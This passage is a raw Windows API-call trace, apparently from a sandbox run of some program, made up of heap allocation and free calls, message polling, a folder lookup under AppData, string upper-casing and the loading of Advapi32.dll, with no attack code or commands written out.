| out: hHeap=0x2af0000) returned 1 [0124.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0124.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0124.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0124.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0124.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0124.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0124.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0124.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0124.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0124.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0124.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0124.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0124.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0124.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0124.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0124.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0124.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0124.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0124.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0124.226] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Microsoft", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0x9a43c0 [0124.226] FindClose (in: hFindFile=0x9a43c0 | out: hFindFile=0x9a43c0) returned 1 [0124.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0124.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0124.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0124.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0124.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0124.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0124.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0124.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0124.226] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0124.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0124.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0124.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0124.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0124.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0124.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0124.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0124.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0124.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0124.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0124.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0124.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0124.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0124.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0124.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0124.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0124.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0124.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0124.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0124.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0124.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0124.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0124.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0124.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0124.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0124.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0124.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0124.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0124.244] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0124.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0124.244] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0124.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0124.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0124.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa1e0 [0124.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0124.244] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0124.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0124.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0124.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0124.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0124.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0124.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0124.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0124.245] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0124.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0124.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0124.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0124.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0124.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0124.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0124.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0124.245] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0124.245] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0124.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0124.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0124.245] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0124.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0124.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0124.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa078 [0124.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0124.245] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0124.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0124.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0124.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0124.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0124.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0124.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0124.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0124.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0124.246] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0124.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0124.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0124.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0124.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0124.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0124.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0124.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0124.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0124.246] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0124.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0124.246] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0124.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0124.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0124.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0124.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0124.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0124.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0124.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0124.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0124.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0124.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0124.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0124.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0124.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0124.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0124.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0124.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0124.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0124.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0124.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0124.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0124.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0124.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0124.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0124.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0124.247] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0124.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0124.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0124.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0124.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0124.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0124.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0124.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0124.248] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0124.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0124.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0124.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0124.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0124.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0124.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0124.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0124.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0124.248] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0124.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0124.248] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0124.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0124.248] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0124.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0124.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0124.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0124.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fb8 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0124.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0124.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0124.249] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, 